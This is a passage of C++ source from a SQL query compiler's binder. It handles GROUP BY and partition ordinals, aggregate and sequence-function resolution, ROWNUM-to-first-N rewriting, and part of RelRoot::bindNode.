ids ValueIdSet groupExprCpy(grby->groupExpr()); // When we encounter subqueries or MVFs in the select list // these gets expanded at bind time, and so the select index have to // be offset with the expansion number since the sel_index number // reflects the select list at parse time. for (ValueId vid = groupExpr.init(); groupExpr.next(vid); groupExpr.advance(vid)) { if (vid.getItemExpr()->getOperatorType() == ITM_SEL_INDEX) { CollIndex selIndexExpansionOffset = 0; SelIndex * si = (SelIndex*)(vid.getItemExpr()); ValueId grpById = compExpr()[si->getSelIndex() -1]; si->setValueId(grpById); if (child(0)->getOperatorType() != REL_SEQUENCE) { groupExprCpy.remove(vid); groupExprCpy.insert(grpById); } else { //sequence CMPASSERT(seqNode); const ValueIdSet seqCols = ((const RelSequence*)seqNode)->sequencedColumns(); ItemExpr * ie = grpById.getItemExpr(); ItemExpr::removeNotCoveredFromExprTree(ie,seqCols); //ie = ie->copyTree(bindWA->wHeap()); //ie = ie->bindNode(bindWA); if (bindWA->errStatus()) return NULL; groupExprCpy.remove(vid); groupExprCpy.insert(ie->getValueId()); ie = new (bindWA->wHeap()) NotCovered(ie); ie->synthTypeAndValueId(); compExpr()[si->getSelIndex()-1] = ie->getValueId(); seqNode->addSequencedColumn(ie->getValueId()); } switch (grpById.getItemExpr()->getOperatorType()) { case ITM_VALUEID_PROXY: { ValueId derivedId = (( ValueIdProxy *)(grpById.getItemExpr()))->isDerivedFrom(); // If this is not the ValueIdProxy that represents the MVF or Subq // skip the expansion. 
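          // Illustrative (hypothetical) example: if the select list
          // contained an MVF returning two outputs (x, y) and the GROUP BY
          // referenced it by ordinal, the select list was already expanded
          // at bind time; the extra output y is added to the group
          // expression below and any later SelIndexes are shifted by the
          // expansion offset.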
if ((( ValueIdProxy *)(grpById.getItemExpr()))-> needToTransformChild() != TRUE) break; ValueIdList outputs; switch (derivedId.getItemExpr()->getOperatorType()) { case ITM_USER_DEF_FUNCTION: { // When we reference a UDF in the groupBy clause, // if the UDF is a MVF(has multiple outputs), we need to add // the other elements from the MVF's outputs. // These elements have already been expanded into the // select list, so all we need to do is to add them to the // groupby expression. // By default, we associate the valueId of the MVF with // its first output, so we just need to copy the rest of the // outputs. UDFunction *udf = (UDFunction *) derivedId.getItemExpr(); const RoutineDesc *rDesc = udf->getRoutineDesc(); outputs = rDesc->getOutputColumnList(); break; } case ITM_ROW_SUBQUERY: { // When we reference a subquery in the groupBy clause, // if the subquery has a degree > 1, we need to add the other // elements from the subquery's select list. Subquery *subq = (Subquery *) derivedId.getItemExpr(); RelRoot *subqRoot = (RelRoot *) subq->getSubquery(); outputs = subqRoot->compExpr(); break; } default: CMPASSERT(0); // we don't support anything else } // Add in the other outputs from the MVF/Subquery for (CollIndex i=1; i < outputs.entries(); i++) { selIndexExpansionOffset ++; groupExprCpy.insert(outputs[i]); } // Need to check the groupBy and orderBy lists // for selIndexes with an index greater than this one, // If we find one, bump its index into the select list by // the expansion. ValueIdSet fixedUpIndecies; fixUpSelectIndeciesInSet(grby->groupExpr(),fixedUpIndecies, si->getSelIndex(), selIndexExpansionOffset); fixUpSelectIndecies(getOrderByTree(), fixedUpIndecies, si->getSelIndex(), selIndexExpansionOffset); break; } } // Now that we have swapped the vid list from grouping // expression to the corresponding one from select list // go thru each expression, collect the base columns // and mark each column as referenced for histogram. 
// Since this is only for group by, we will get only single // interval histograms - 10-081015-6557 ValueIdSet columns; grpById.getItemExpr()->findAll(ITM_BASECOLUMN, columns, TRUE, TRUE); for (ValueId id = columns.init(); columns.next(id); columns.advance(id)) { NAColumn *nacol = id.getNAColumn(); if (nacol->isReferencedForHistogram()) continue; nacol->setReferencedForSingleIntHist(); } } // found Sel Index } // recreate the groupExpr expression after updating the value ids grby->setGroupExpr (groupExprCpy); if (((CmpCommon::getDefault(GROUP_BY_USING_ORDINAL) != DF_OFF) || (specialMode)) && (grby->selPredTree()) && (grby->selIndexInHaving())) { setValueIdForRenamedColsInHaving(bindWA, grby->selPredTree(), compExpr()); BindScope *currScope = bindWA->getCurrentScope(); ItemExpr *havingPred = grby->removeSelPredTree(); currScope->context()->inHavingClause() = TRUE; havingPred->convertToValueIdSet(grby->selectionPred(), bindWA, ITM_AND); currScope->context()->inHavingClause() = FALSE; if (bindWA->errStatus()) return this; } if (orderByTree_ && seqNode && grby) { ItemExprList origOrderByList(bindWA->wHeap()); origOrderByList.insertTree(orderByTree_); ItemExprList newOrderByList((Lng32)origOrderByList.entries(), bindWA->wHeap()); for (CollIndex i = 0; (i < (CollIndex) origOrderByList.entries());i++) { ItemExpr * currOrderByItemExpr = ((ItemExpr *) origOrderByList[i])->castToItemExpr(); ItemExpr * newOrderByItemExpr = currOrderByItemExpr; if (currOrderByItemExpr->getOperatorType() == ITM_SEL_INDEX) { SelIndex * si = (SelIndex*)(currOrderByItemExpr); if (compExpr()[si->getSelIndex()-1].getItemExpr()->getOperatorType() != ITM_BASECOLUMN) { newOrderByItemExpr = compExpr()[si->getSelIndex()-1].getItemExpr(); } } newOrderByList.insert(newOrderByItemExpr); } orderByTree_ = newOrderByList.convertToItemExpr(); } return this; } void RelRoot::transformTDPartitionOrdinals(BindWA *bindWA) { if(!getHasTDFunctions()) return ; if (getCompExprTree() == NULL) return ; BindScope *currScope = bindWA->getCurrentScope(); RelExpr * realChildNode = NULL; if (child(0)->getOperatorType() == REL_FIRST_N) { realChildNode = child(0)->child(0); } else { realChildNode = child(0); } if(realChildNode->getOperatorType() != REL_SEQUENCE ) { return; } RelSequence * seqNode = (RelSequence *)realChildNode; if (!seqNode->getPartitionBy()) { return; } ItemExpr * partitionBy = seqNode->getPartitionBy()->copyTree(bindWA->wHeap()); ItemExprList origSelectList(getCompExprTree(), bindWA->wHeap()); ItemExprList origPartitionByList(bindWA->wHeap()); if (partitionBy) { origPartitionByList.insertTree(partitionBy); } for (CollIndex i = 0; (i < (CollIndex) origPartitionByList.entries());i++) { ItemExpr * currPartitionByItemExpr = ((ItemExpr *) origPartitionByList[i])->castToItemExpr(); NABoolean selIndexError = FALSE; Int64 selIndex = -1; if (currPartitionByItemExpr->getOperatorType() == ITM_CONSTANT) { ConstValue * cv = (ConstValue*)currPartitionByItemExpr; if ((cv->canGetExactNumericValue()) && (cv->getType()->getScale() == 0)) { selIndex = cv->getExactNumericValue(); if (selIndex <= 0 || selIndex > origSelectList.entries()) { //index in error -- produce error message //in TD mode group by <constant> -- constant is purely positional //selIndexError = TRUE; *CmpCommon::diags() << DgSqlCode(-4366); bindWA->setErrStatus(); return; } else { origPartitionByList.usedEntry( i )= origSelectList.usedEntry((CollIndex)selIndex-1)->copyTree(bindWA->wHeap()); } } } } seqNode->setPartitionBy(origPartitionByList.convertToItemExpr()); } // resolveAggregates 
- // If aggregate functions have been found in the select list, then // either attach the aggregate functions to the existing GroupBy below // this RelRoot, or if there is no GroupBy create a GroupBy with an // empty groupby list (scalar) and attach the aggregate functions to // this GroupBy. // void RelRoot::resolveAggregates(BindWA *bindWA) { BindScope *currScope = bindWA->getCurrentScope(); if (NOT currScope->getUnresolvedAggregates().isEmpty()) { if (getHasTDFunctions()) { //Using rank function and aggregate functions in the same scope is not supported. *CmpCommon::diags() << DgSqlCode(-4365); bindWA->setErrStatus(); return; } RelExpr *sequence = currScope->getSequenceNode(); // The aggregates were used without a GROUP BY or HAVING // clause, i.e. an implicit aggregation is performed // (with a NULL result for an empty input table). NABoolean implicitGrouping = (child(0)->getOperatorType() != REL_GROUPBY); if(getHasOlapFunctions()) { implicitGrouping = (sequence->child(0)->getOperatorType() != REL_GROUPBY); } GroupByAgg *groupByAgg = NULL; if (implicitGrouping) { RelExpr * realChildNode = NULL; // if my child is a FIRST_N node, then add the GroupByAgg below it. // Otherwise, add the GroupByAgg below me. if (child(0)->getOperatorType() == REL_FIRST_N) { realChildNode = child(0)->child(0); } else realChildNode = child(0); if(getHasOlapFunctions()) { realChildNode = sequence->child(0); } groupByAgg = new (bindWA->wHeap()) GroupByAgg(realChildNode,REL_GROUPBY); realChildNode->setBlockStmt(isinBlockStmt()); if(getHasOlapFunctions()) sequence->setChild(0, groupByAgg); else if (child(0)->getOperatorType() == REL_FIRST_N) child(0)->setChild(0, groupByAgg); else setChild(0, groupByAgg); groupByAgg->setBlockStmt(isinBlockStmt()); } else { if(getHasOlapFunctions()) { groupByAgg = (GroupByAgg *)sequence->child(0).getPtr(); } else { groupByAgg = (GroupByAgg *)child(0).getPtr(); } } NAString colName(bindWA->wHeap()); Lng32 sqlCode = 0; ValueId valId = NULL_VALUE_ID; if (currScope->context()->unaggColRefInSelectList()) { sqlCode = -4021; valId = currScope->context()->unaggColRefInSelectList()->getValueId(); } else if (implicitGrouping) { // Genesis 10-000414-9410: "SELECT SUM(A),* FROM T; --no GROUP BY" // cannot be flagged with err 4012 in ColReference::bindNode // because table not marked "grouped" yet. // const ColumnDescList &cols = *currScope->getRETDesc()->getColumnList(); CollIndex i, n = cols.entries(); for (i=0; i<n; i++) { const ColumnDesc *col = cols[i]; if (!col->isGrouped()) if (col->getColRefNameObj().isStar() || col->getValueId().getNAColumn(TRUE/*okIfNotColumn*/)) { sqlCode = -4012; valId = col->getValueId(); colName = col->getColRefNameObj().getColRefAsAnsiString(); break; } } } // Table has no GROUP BY (so no grouping columns exist at all) // but is grouped by dint of a column reference within an aggregate, // making any unaggregated column references illegal, by ANSI 7.9 SR 7. if (sqlCode) { if (colName.isNull()) { const NAColumn *nacol = valId.getNAColumn(TRUE/*okIfNotColumn*/); if (nacol) colName = nacol->getFullColRefNameAsAnsiString(); else colName = "_unnamed_column_"; } // 4012 Col ref must be grouping or aggregated -- no star ref allowed! // 4021 The select list contains a non-grouping non-aggregated column. *CmpCommon::diags() << DgSqlCode(sqlCode) << DgColumnName(colName); bindWA->setErrStatus(); return; } // Move the unresolved aggregates into the groupby node and bind // (simply returns if "groupByAgg" isn't new). 
groupByAgg->aggregateExpr() += currScope->getUnresolvedAggregates(); currScope->getUnresolvedAggregates().clear(); groupByAgg->bindNode(bindWA); } } // resolveSequenceFunctions - // Add the unresolvedSequenceFunctions to the Sequence node for this // scope. If there are sequence functions, but no sequence node, it // is an error. Also if there is a sequence node, but no sequence // functions, it is an error. // // void RelRoot::resolveSequenceFunctions(BindWA *bindWA) { BindScope *currScope = bindWA->getCurrentScope(); // If we have a Sequence Node associated with the RelRoot node, // RelSequence *sequenceNode = (RelSequence *)currScope->getSequenceNode(); currScope->getSequenceNode() = NULL; if (sequenceNode) { if (getHasTDFunctions() && sequenceNode->child(0)->getOperatorType() == REL_GROUPBY) { //Using rank function and group by clause in the same scope is not supported. *CmpCommon::diags() << DgSqlCode(-4366); bindWA->setErrStatus(); return; } CMPASSERT(sequenceNode->getOperatorType() == REL_SEQUENCE); // Do not allow sequence functions or OLAP Window functions // with Embedded Updates. // if (getGroupAttr()->isEmbeddedUpdateOrDelete()){ *CmpCommon::diags() << DgSqlCode(-4202) << (getGroupAttr()->isEmbeddedUpdate() ? DgString0("UPDATE"):DgString0("DELETE")); bindWA->setErrStatus(); return; } // If there are some sequence functions that have not been attached // to the Sequence node, do so now. These were found when binding // the select list. // sequenceNode-> addUnResolvedSeqFunctions(currScope->getUnresolvedSequenceFunctions(), bindWA); currScope->getUnresolvedSequenceFunctions().clear(); currScope->getAllSequenceFunctions().clear(); if (bindWA->errStatus()) return; // Make sure the sequence function has some work to do. // The cast is needed since the compiler will attempt to pick the // protected (writable) version of 'sequenceFunctions()'. (Is this // a compiler bug) // if ((((const RelSequence *)sequenceNode)->sequenceFunctions().isEmpty() ) && ( !getHasOlapFunctions() && ((const RelSequence *)sequenceNode)->requiredOrder().entries() != 0 )) { // Can't have a sequence by clause without // sequence functions. // *CmpCommon::diags() << DgSqlCode(-4111); bindWA->setErrStatus(); return; } } else if (! currScope->getUnresolvedSequenceFunctions().isEmpty()) { // Can't have sequence functions without a // sequence by clause. // First, loop through the list of functions. // ValueIdSet &unresolved = currScope->getUnresolvedSequenceFunctions(); NAString unparsed(bindWA->wHeap()); for (ValueId vid = unresolved.init(); unresolved.next(vid); unresolved.advance(vid)) { ItemExpr *ie = vid.getItemExpr(); CMPASSERT(ie->isASequenceFunction()); unparsed += ", "; ie->unparse(unparsed, DEFAULT_PHASE, USER_FORMAT_DELUXE); } unparsed.remove(0,2); // remove initial ", " *CmpCommon::diags() << DgSqlCode(-4110) << DgString0(unparsed); bindWA->setErrStatus(); return; } } // if a where pred is specified on an immediate child scan or rename node, // and it contains an 'and'ed rownum() predicate of the form: // rownum < val, or rownum <= val, or rownum = val // then get the val and make it the firstN value. // Also, remove this predicate from selPredTree. void RelRoot::processRownum(BindWA * bindWA) { NABoolean specialMode = (CmpCommon::getDefault(MODE_SPECIAL_4) == DF_ON); if (NOT specialMode) return; if (! child(0)) return; if ((child(0)->getOperatorType() != REL_SCAN) && (child(0)->getOperatorType() != REL_RENAME_TABLE)) return; if (! 
child(0)->selPredTree()) return; ItemExpr * wherePred = child(0)->selPredTree(); ItemExprList iel(wherePred, bindWA->wHeap(), ITM_AND, FALSE, FALSE); NABoolean found = FALSE; for (Lng32 i = 0; ((NOT found) && (i < iel.entries())); i++) { ItemExpr * ie = iel[i]; if (ie->getArity() != 2) continue; if (NOT ((ie->getOperatorType() == ITM_LESS) || (ie->getOperatorType() == ITM_EQUAL) || (ie->getOperatorType() == ITM_LESS_EQ))) continue; ItemExpr * child0 = ie->child(0)->castToItemExpr(); ItemExpr * child1 = ie->child(1)->castToItemExpr(); if (NOT ((child0->getOperatorType() == ITM_REFERENCE) && (child1->getOperatorType() == ITM_CONSTANT))) continue; ColReference * col = (ColReference*)child0; ColRefName &colRefName = col->getColRefNameObj(); CorrName &cn = col->getCorrNameObj(); const NAString &catName = cn.getQualifiedNameObj().getCatalogName(); const NAString &schName = cn.getQualifiedNameObj().getSchemaName(); const NAString &objName = cn.getQualifiedNameObj().getObjectName(); const NAString &colName = colRefName.getColName(); if (NOT ((catName.isNull()) && (schName.isNull()) && (objName.isNull()) && (colName == "ROWNUM"))) continue; ConstValue * cv = (ConstValue*)child1; if (NOT cv->canGetExactNumericValue()) continue; Int64 val = cv->getExactNumericValue(); if (val < 0) continue; if ((ie->getOperatorType() == ITM_EQUAL) && (val != 1)) continue; if ((ie->getOperatorType() == ITM_LESS) && (val > 0)) val--; setFirstNRows(val); // remove this pred from the list iel.removeAt(i); found = TRUE; } if (found) { // convert the list back to selection pred. ItemExpr * ie = iel.convertToItemExpr(); child(0)->removeSelPredTree(); child(0)->addSelPredTree(ie); } return; } RelExpr *RelRoot::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } if (isTrueRoot()) { // if this is simple scalar aggregate on a seabase table // (of the form: select count(*), sum(a) from t; ) // then transform it so it could be evaluated using hbase co-processor. if ((CmpCommon::getDefault(HBASE_COPROCESSORS) == DF_ON) && (child(0) && child(0)->getOperatorType() == REL_SCAN)) { Scan * scan = (Scan*)child(0)->castToRelExpr(); if ((getCompExprTree()) && (NOT hasOrderBy()) && (! getSelPredTree()) && (! scan->getSelPredTree()) && (scan->selectionPred().isEmpty()) && ((scan->getTableName().getSpecialType() == ExtendedQualName::NORMAL_TABLE) || (scan->getTableName().getSpecialType() == ExtendedQualName::INDEX_TABLE)) && !scan->getTableName().isPartitionNameSpecified() && !scan->getTableName().isPartitionRangeSpecified() && (NOT bindWA->inViewDefinition())) { ItemExprList selList(bindWA->wHeap()); selList.insertTree(getCompExprTree()); // for now, only count(*) can be co-proc'd if ((selList.entries() == 1) && (selList[0]->getOperatorType() == ITM_COUNT) && (selList[0]->origOpType() == ITM_COUNT_STAR__ORIGINALLY)) { NATable *naTable = bindWA->getNATable(scan->getTableName()); if (bindWA->errStatus()) return this; if (((naTable->getObjectType() == COM_BASE_TABLE_OBJECT) || (naTable->getObjectType() == COM_INDEX_OBJECT)) && ((naTable->isSeabaseTable()) || ((naTable->isHiveTable()) && (naTable->getClusteringIndex()->getHHDFSTableStats()->isOrcFile())))) { Aggregate * agg = new(bindWA->wHeap()) Aggregate(ITM_COUNT, new (bindWA->wHeap()) SystemLiteral(1), FALSE /*i.e. 
not distinct*/, ITM_COUNT_STAR__ORIGINALLY, '!'); agg->bindNode(bindWA); if (bindWA->errStatus()) { return this; } ValueIdSet aggrSet; aggrSet.insert(agg->getValueId()); ExeUtilExpr * eue = NULL; if (naTable->isSeabaseTable()) eue = new(CmpCommon::statementHeap()) ExeUtilHbaseCoProcAggr(scan->getTableName(), aggrSet); else eue = new(CmpCommon::statementHeap()) ExeUtilOrcFastAggr(scan->getTableName(), aggrSet); eue->bindNode(bindWA); if (bindWA->errStatus()) { return this; } setChild(0, eue); removeCompExprTree(); addCompExprTree(agg); } // if seabaseTable } // count aggr } } // coproc on if (child(0) && ((child(0)->getOperatorType() == REL_INSERT) || (child(0)->getOperatorType() == REL_UNARY_INSERT) || (child(0)->getOperatorType() == REL_LEAF_INSERT))) { Insert * ins = (Insert*)child(0)->castToRelExpr(); if (ins->isNoRollback()) { if ((CmpCommon::getDefault(AQR_WNR) != DF_OFF) && (CmpCommon::getDefault(AQR_WNR_INSERT_CLEANUP) != DF_OFF)) ins->enableAqrWnrEmpty() = TRUE; } if (CmpCommon::transMode()->anyNoRollback()) { // tbd - may need to integrate these two. if ((CmpCommon::getDefault(AQR_WNR) != DF_OFF) && (CmpCommon::getDefault(AQR_WNR_INSERT_CLEANUP) != DF_OFF)) ins->enableAqrWnrEmpty() = TRUE; } } // if lob is being extracted as chunks of string, then only one // such expression could be specified in the select list. // If this is the case, then insert ExeUtilLobExtract operator. // This operator reads lob contents and returns them to caller as // multiple rows. // This lobextract function could only be used in the outermost select // list and must be converted at this point. // It is not evaluated on its own. if (getCompExprTree()) { ItemExprList selList(bindWA->wHeap()); selList.insertTree(getCompExprTree()); if ((selList.entries() == 1) && (selList[0]->getOperatorType() == ITM_LOBEXTRACT)) { LOBextract * lef = (LOBextract*)selList[0]; ExeUtilLobExtract * le = new (PARSERHEAP()) ExeUtilLobExtract (lef, ExeUtilLobExtract::TO_STRING_, NULL, NULL, lef->getTgtSize(), 0, NULL, NULL, NULL, child(0), PARSERHEAP()); le->setHandleInStringFormat(FALSE); setChild(0, le); } } processRownum(bindWA); } // isTrueRoot if (getHasTDFunctions()) { transformTDPartitionOrdinals(bindWA); if (bindWA->errStatus()) return NULL; } RelRoot * returnedRoot = transformGroupByWithOrdinalPhase1(bindWA); if (! returnedRoot) return NULL; returnedRoot = transformOrderByWithExpr(bindWA); if (! returnedRoot) return NULL; if (bindWA->getCurrentScope()->context()->inTableCheckConstraint()) { // See ANSI 11.9 Leveling Rule 1a (Intermediate Sql). // 4089 A check constraint cannot contain a subquery. *CmpCommon::diags() << DgSqlCode(-4089) << DgConstraintName( bindWA->getCurrentScope()->context()->inCheckConstraint()-> getConstraintName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); } if (isTrueRoot()) bindWA->setTopRoot(this); bindWA->setBindTrueRoot(isTrueRoot()); if (!bindWA->getAssignmentStArea()) { bindWA->getAssignmentStArea() = new (bindWA->wHeap()) AssignmentStArea(bindWA); bindWA->getAssignmentStArea()->getAssignmentStHostVars() = new (bindWA->wHeap()) AssignmentStHostVars(bindWA); } // If there are one or more output rowset variables, then we introduce // a RowsetInto node below this Root node. The RowsetInto node will // create a Pack node later on when it is binded, so that we can // insert values into the rowset output variables. // We don't do this transformation if we are inside a compound statement. 
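  // Illustrative (hypothetical) example: for an embedded
  //   SELECT a INTO :arr FROM t;
  // where :arr is an output rowset host variable, the code below wraps the
  // current root in a RowsetInto node under a new true root.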
// if (isTrueRoot() && assignmentStTree()) { ItemExpr *outputVar = getOutputVarTree(); if (outputVar) { CMPASSERT(outputVar->getChild(0)->getOperatorType() == ITM_HOSTVAR); HostVar *hostVar = (HostVar *) outputVar->getChild(0); if (hostVar->getType()->getTypeQualifier() == NA_ROWSET_TYPE) { ItemExpr *outputVar = removeOutputVarTree(); assignmentStTree() = NULL; // Get the output size expression. It may be a constant or a variable. ItemExpr * sizeExpr = getHostArraysArea()->outputSize(); // set the SelectIntoRowsets flag getHostArraysArea()->setHasSelectIntoRowsets(TRUE); // Create INTO node. Its child is the current root RelExpr *intoNode = new (bindWA->wHeap()) RowsetInto(this, outputVar, sizeExpr); //If case of first N with ORDER BY generator introduces the FIRST N //operator. For rowsets FIRST N node need to be introduced below the //PACK node and not below the top root. So set first N rows for INTO //node and not the top root. if (hasOrderBy()) { intoNode->setFirstNRows(getFirstNRows()); setFirstNRows(-1); } // Create a new root node that will go above the RowsetInto node setRootFlag(FALSE); RelRoot *newRoot = new (bindWA->wHeap()) RelRoot(intoNode); newRoot->setRootFlag(TRUE); // copy the display flag from this true Root to the new root. // newRoot->setDisplayTree(getDisplayTree()); newRoot->setDisplayTree(TRUE); newRoot->addInputVarTree(removeInputVarTree()); newRoot->outputVarCnt() = outputVarCnt(); NABoolean defaultSortedRows = newRoot->needFirstSortedRows(); //Int64 defaultFirstNRows = newRoot->getFirstNRows(); newRoot->needFirstSortedRows() = needFirstSortedRows(); //newRoot->setFirstNRows(getFirstNRows()); needFirstSortedRows() = defaultSortedRows; // setFirstNRows(defaultFirstNRows); newRoot->rollbackOnError() = rollbackOnError(); // migrate hostArraysArea to newroot, and tell bindWA about it newRoot->setHostArraysArea(getHostArraysArea()); bindWA->setHostArraysArea(getHostArraysArea()); setSubRoot(FALSE); // old root is no longer the root newRoot->setSubRoot(TRUE); // newRoot becomes the root return newRoot->bindNode(bindWA); } } } if (assignmentStTree() && child(0)->getOperatorType() != REL_ROWSET_INTO) { AssignmentStHostVars *ptr = new (bindWA->wHeap()) AssignmentStHostVars(bindWA); if (ptr->containsRowsets(assignmentStTree())) { ItemExpr *outputSizeExpr = NULL; // The user may have used the ROWSET FOR OUTPUT SIZE construct // set the SelectIntoRowsets flag. if (getHostArraysArea()) { outputSizeExpr = getHostArraysArea()->outputSize(); getHostArraysArea()->setHasSelectIntoRowsets(TRUE); } // Create RowsetInto node. Its child is the current root RelExpr *intoNode = new (bindWA->wHeap()) RowsetInto(this, assignmentStTree(), outputSizeExpr); //If case of first N with ORDER BY generator introduces the FIRST N //operator. For rowsets FIRST N node need to be introduced below the //PACK node and not below the top root. So set first N rows for INTO //node and not the top root. if (hasOrderBy()) { intoNode->setFirstNRows(getFirstNRows()); setFirstNRows(-1); } RelRoot *newRoot = new (bindWA->wHeap()) RelRoot(*this); newRoot->child(0) = intoNode; newRoot->removeCompExprTree(); setRootFlag(FALSE); removeInputVarTree(); assignmentStTree() = NULL; return newRoot->bindNode(bindWA); } } // Create a new scope. // if (!isDontOpenNewScope()) // -- Triggers. { bindWA->initNewScope(); // MV -- if(TRUE == hasMvBindContext()) { // Copy the MvBindContext object from the RelRoot node to the // current BindContext. 
bindWA->markScopeWithMvBindContext(getMvBindContext()); } if (getInliningInfo().isTriggerRoot()) { CMPASSERT(getInliningInfo().getTriggerObject() != NULL); bindWA->getCurrentScope()->context()->triggerObj() = getInliningInfo().getTriggerObject()->getCreateTriggerNode(); } if (getInliningInfo().isActionOfRI()) bindWA->getCurrentScope()->context()->inRIConstraint() = TRUE; } // Save whether the user specified SQL/MP-style access options in the query // (this is always true for the LOCK stmt, which we must maximize). // if (child(0)->getOperatorType() == REL_LOCK) { accessOptions().updateAccessOptions( TransMode::ILtoAT(TransMode::READ_COMMITTED_), ((RelLock *)child(0).getPtr())->getLockMode()); accessOptions().updateAccessOptions( TransMode::ILtoAT(CmpCommon::transMode()->getIsolationLevel())); } // QSTUFF: the updateOrDelete flag is set to ensure that scans done as // part of a generic update cause an exclusive lock to be set to ensure // a consistent completion of the following update or delete. if (containsUpdateOrDelete(this)) { accessOptions().setUpdateOrDelete(TRUE); } else if (isTrueRoot()) { // if the query does not contain any Generic Update nodes, mark it // as read only query. In that case, we have freedom not to include // some indexes in the indexes list. bindWA->setReadOnlyQuery(); } // This block of code used to be in RelRoot::propagateAccessOptions() which // used to be called from here. We've since replaced this old 'push' call // with the 'pull' of BindWA->findUserSpecifiedAccessOption() calls from // RelRoot, Scan, and GenericUpdate. // QSTUFF // We decided to stick with READ COMMITTED as the default access // (even for streams). However, if we change our mind again, this is // the place to do it. // if (getGroupAttr()->isStream() && // (accessOptions().accessType() == ACCESS_TYPE_NOT_SPECIFIED_)) // accessOptions().accessType() = SKIP_CONFLICT_; // Set the flag to indicate to DP2 that this executes an // embedded update or delete. if (getGroupAttr()->isEmbeddedUpdateOrDelete()) accessOptions().setUpdateOrDelete(TRUE); // QSTUFF if (accessOptions().userSpecified()) bindWA->getCurrentScope()->context()->setStmtLevelAccessOptions(accessOptions()); if (isSubRoot() && getHostArraysArea()) getHostArraysArea()->setRoot(this); if (isTrueRoot()) { // If this were false, then SynthType's ValueDesc::create() // would use a DIFFERENT SchemaDB than BindItemExpr's createValueDesc() // -- wrong! Assert this only once per query. CMPASSERT(ActiveSchemaDB() == bindWA->getSchemaDB()); // set the upDateCurrentOf_ attribute for the root if possible if (child(0)->getOperatorType() == REL_UNARY_UPDATE || child(0)->getOperatorType() == REL_UNARY_DELETE) { GenericUpdate *gu = (GenericUpdate *)child(0)->castToRelExpr(); if (gu->updateCurrentOf()) { updateCurrentOf() = gu->updateCurrentOf(); currOfCursorName() = gu->currOfCursorName(); } } // If we are processing a rowset, // then the child operator is a REL_TSJ. // If this is the case, and the operation is // an update or delete, we need to search // further to deterine its correct child // operator type. // Otherwise, the child operator type is correct. 
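    // Illustrative (hypothetical) example: a rowset delete such as
    //   DELETE FROM t WHERE a = :arr;
    // is parsed with a TSJ child, so the code below records
    // REL_UNARY_DELETE (or REL_UNARY_UPDATE when a SET clause uses the
    // rowset) as the logical childOperType() instead.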
if (bindWA->getHostArraysArea() && bindWA->getHostArraysArea()->hasHostArraysInWhereClause() && bindWA->getHostArraysArea()->hasInputRowsetsInSelectPredicate() == HostArraysWA::NO_ && NOT bindWA->getHostArraysArea()->hasHostArraysInTuple()) // ensure that we don't flag rowset selects or insert selects with rowsets in the predicate { if (bindWA->getHostArraysArea()->hasHostArraysInSetClause()) // includes rowset merge statements too childOperType() = REL_UNARY_UPDATE; else childOperType() = REL_UNARY_DELETE; } else childOperType() = child(0)->getOperator(); // see if we can potentially optimize the buffer sizes for // oltp queries. Done for update/delete/insert-values/select-unique. // if scan, olt opt is possible. if (childOperType() == REL_SCAN) oltOptInfo().setOltOpt(TRUE); /* // For Denali release 1, compound statements are restricted // to yield at most one row; so olt opt is possible for CS. // If a compound statement is not pushed down to DP2, then // OLT optimization will be turned off in generator. // // Turn it off for Compound statement as insertion with tuple list // is possible in a CS. */ else if (childOperType() == REL_COMPOUND_STMT) oltOptInfo().setOltOpt(TRUE); // if INSERT...VALUES, olt opt is possible. else if ((childOperType() == REL_UNARY_INSERT) && (NOT child(0)->child(0) || child(0)->child(0)->getOperatorType() == REL_TUPLE)) oltOptInfo().setOltOpt(TRUE); } // isTrueRoot else if (checkFirstNRowsNotAllowed(bindWA)) { *CmpCommon::diags() << DgSqlCode(-4102); bindWA->setErrStatus(); return NULL; } BindScope *currScope = bindWA->getCurrentScope(); // -- MVs // Check for the Refresh node before binding, because after binding it // will be gone. if (child(0)->getOperatorType() == REL_REFRESH) setRootOfInternalRefresh(); // set the currect host area in bindWA for non-root stmt. // fix 10-031106-4430 (RG: mxcmp failed to compile INSERT // statement with rowsets within IF statement) HostArraysWA *tempWA = NULL; if ( NOT isTrueRoot() && getHostArraysArea() ) { tempWA = bindWA->getHostArraysArea(); bindWA->setHostArraysArea(getHostArraysArea()); } bindWA->setBindTrueRoot(FALSE); // Bind the children here to determine if we need to rollback on error // for embedded update/delete's. // bindChildren(bindWA); if ( tempWA ) { // Restore previous environment bindWA->setHostArraysArea(tempWA); } if (bindWA->errStatus()) return NULL; // For SPJ, store the spOutParams_ from the bindWA in RelRoot, // We need it at codegen if ( bindWA->getSpOutParams ().entries ()) spOutParams_ = &( bindWA->getSpOutParams ()); if (isTrueRoot()) { if (child(0)->getGroupAttr()->isEmbeddedUpdateOrDelete()) { // Olt optimization is now supported for embedded updates/deletes (pub/sub // thingy) for now. oltOptInfo().setOltOpt(TRUE); if (getFirstNRows() != -1) { // [FIRST/ANY n] syntax cannot be used with an embedded update or embedded delete. *CmpCommon::diags() << DgSqlCode(-4216); bindWA->setErrStatus(); return NULL; } } // If updateCurrentOf_ not set yet // Check the tree for a GenericUpdate RelExpr (anywhere in the tree) // so we can set the root node accordingly. GenericUpdate *gu = getGenericUpdate(this); if (!updateCurrentOf() && gu && gu->updateCurrentOf()) { updateCurrentOf() = gu->updateCurrentOf(); currOfCursorName() = gu->currOfCursorName(); } // if standalone update/delete(no update where current of), // olt opt is possible. 
if (((childOperType() == REL_UNARY_UPDATE) || (childOperType() == REL_UNARY_DELETE)) && (NOT updateCurrentOf())) oltOptInfo().setOltOpt(TRUE); // If transaction statement (begin/commit/rollback/set xn, // olt opt is possible. if (childOperType() == REL_TRANSACTION) oltOptInfo().setOltOpt(TRUE); // Set indication whether transaction need to be aborted on error // during an IUD query. // Rollback will be done for a query that contains // rowsets, or an insert which is // not an 'insert...values' with a single value. // // There are more cases when a transaction will be rolled back on // an IUD error. These are set in GenericUpdate::preCodeGen, // and DP2(IUD)::preCodeGen. // These include embedded update or delete, stream access, non-unique // update or delete... See ::preCodeGen methods for details. rollbackOnError() = FALSE; if (childOperType().match(REL_ANY_GEN_UPDATE)) { if (bindWA->getHostArraysArea() && bindWA->getHostArraysArea()->done()) // rowsets rollbackOnError() = TRUE; else if ((childOperType() == REL_UNARY_INSERT) && (child(0)->child(0) && child(0)->child(0)->getOperatorType() != REL_TUPLE)) rollbackOnError() = TRUE; } if (bindWA->getHostArraysArea() && bindWA->getHostArraysArea()->getTolerateNonFatalError()) { 